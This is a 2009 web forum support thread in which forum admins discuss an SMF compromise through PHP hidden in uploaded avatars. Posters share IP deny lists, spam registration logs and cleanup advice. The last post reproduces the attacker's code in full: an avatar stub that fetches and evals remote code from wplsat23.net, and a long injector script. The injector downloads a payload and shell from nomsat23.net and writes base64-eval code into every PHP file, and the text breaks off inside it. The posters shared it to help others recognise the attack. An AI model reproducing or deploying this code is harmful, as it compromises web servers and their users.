Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM

Previous topic - Next topic

confusion

Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM


This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

rbbot

I'd recommend banning the subnet 94.142.128.0/21 which is subnet allocated to the AS number of the Latvian hosting company from which these attacks originate - at your firewall if you can rather than in forums settings. According to their website, it's not an ISP, just a hosting provider, so unless you are expecting other servers to connect to yours....

The hosting company is http://www.cssgroup.lv/?lang=eng

whatnow

I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD

Tiribulus

Quote from: confusion on May 08, 2009, 01:07:26 PM
Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM


This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.



Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I meant that this topic as a whole has me worried, but I do appreciate the explanation. Still doesn't sound too good though.

oakview

It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

Sunday Driver

Quote from: StarWars Fan on May 07, 2009, 05:23:24 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

[email protected]
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

Interesting, I had that user on my forum for a while. It took me a few days before I found it and banned the IP, but it never uploaded an avatar. Thankfully!

busterone

Quote from: oakview on May 08, 2009, 10:42:24 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.

JBlaze

OK, since I am getting quite a few PM's from members who are having problems with this hack on their forums, let me make it clear that I DO NOT offer PM support. Any PM's requesting support without my prior consent WILL BE IGNORED/DELETED!

If you wish to recieve support from me regarding this hack, whether it be cleaning it or just pure advice on how to do it yourself, please see my Help Available topic and we will go from there.

I am sorry to sound cranky/senile/whatever... but to be quite honest, it's getting ridiculous. I try my best to offer support when I can and I do have a heart believe it or not. But PM'ing me for support just drives me up a wall. The reason for these forums is so that everyone can see the issue and everyone can provide some help where they can.

So pretty please with lots of sugar on top, do not PM me unless I give you consent to do so. Thank you.

Regards,
JBlaze
Jason Clemons
Former Team Member 2009 - 2012

oakview

QuoteI would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.
@busterone - Like I said in my post,
Quotethe RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest.
If you are multi-national as I'm sure many forums are, that approach is not for you. For those that aren't however, it is an option to be considered, carefully considered.

busterone

No problem. If it works, it works.  :)

Soulgirl

I had this problem too... cleaned everything out and still had problems.  Google led me here and I too had krisbarteo as a member.  Banned and deleted him and everything's back to normal.

Thanks guys :)

NinjaZXR

Quote from: GrannyD on May 08, 2009, 10:01:55 PM
I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD

Rather than editing all php files I just replaced all files and folders from a recent backup.
No more errors on the forum.
This should serve as a good reminder to create regular backups.

tumbleweed

appears our friend has posted up his tactics all these folks tried to join within a day:

415 marpmayclerax  [email protected] 194.8.75.16 Today at 12:28:03 AM   
416 JeoneeCausa  [email protected] 213.163.65.83 Today at 12:54:40 AM   
417 totonoittee  [email protected] 71.230.120.176 Today at 01:41:29 AM   
418 auditajaw  [email protected] 89.28.3.241 Today at 02:51:53 AM   
419 intitrelf  [email protected] 221.116.142.90 Today at 03:57:37 AM   
420 mamHoaphons  [email protected] 195.2.240.117 Today at 04:07:06 AM   
421 KesBreaphWese  [email protected] 194.8.75.15 Today at 05:52:15 AM   
422 drycletefetle  [email protected] 194.8.75.54 Today at 05:59:14 AM   
423 nupabadoPeeda  [email protected] 194.8.75.42 Today at 06:01:03 AM   
424 ðàñêðóòêà ñàéòîâ  [email protected] 95.220.71.169 Today at 08:00:57 AM   
425 wowgoldstright  [email protected] 89.149.217.184 Today at 08:12:47 AM   
426 guenciede  [email protected] 64.56.73.226 Today at 09:45:28 AM   
427 getapruntee  [email protected] 221.179.6.85 Today at 09:47:13 AM   
428 adefeclew  [email protected] 86.57.155.242 Today at 10:02:56 AM   
429 Natreseearm  [email protected] 94.178.5.237 Today at 11:04:13 AM   
430 nuyullerxruu  [email protected] 94.102.51.196 Today at 11:59:40 AM   
431 eagetaacitire  [email protected] 87.117.35.79 Today at 12:17:42 PM   
432 voidonduchend  [email protected] 95.24.206.154 Today at 12:59:28 PM   
433 irrapeApocA  [email protected] 64.56.73.226 Today at 03:20:13 PM   
434 inardynutty  [email protected] 195.2.240.117 Today at 03:30:09 PM   
435 Veinswaw  [email protected] 65.15.161.58 Today at 05:10:38 PM   
436 JernHinna  [email protected] 64.56.73.226 Today at 05:13:52 PM   
437 Injecume  [email protected] 68.32.158.166 Today at 06:58:25 PM   
438 Infefsendeamp  [email protected] 64.56.73.226 Today at 07:02:38 PM   
439 Dimbsuisa  [email protected] 86.121.176.110 Today at 07:05:38 PM   
   
Hope every one has tightend up the forums.
G.C. SOLUTIONS - Hosting Quality Sites Since 2006. Experience Your Forums On A Whole New Level
Elastic Sites Stress Fast CPU/Ram Upgrades- More Info Here.
Reviews By SMF Forum Owners - Read Our Rev

JBlaze

Mines sealed up tighter than a crabs ass :P
Jason Clemons
Former Team Member 2009 - 2012

busterone

 :D
Mine as well. I haven't even had a valid registration in 3 days.

WillyP

One of my forums got hit by Krisbarteo too. Every php file on the domain same as described here. So I created a post based member group to prevent uploading and attaching until a member has 10 posts. There was an uploaded avatar, the only avatar that was a jpg, 1x1 pixel. Opened it up and sure enough php code. I wonder if the upload script could compare file size to image size and flag suspicious files? Would this be easier than scanning a file for php tags? For that matter, who would ever upload a 1x1 image anyway?  Of course, if a minimum image size was enacted, it would be pretty easy for someone to just use a larger image.

chrishicks

Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

tjhanes

Quote from: sjokomelk on May 06, 2009, 01:35:59 PM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>

and this is the code on that page:
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
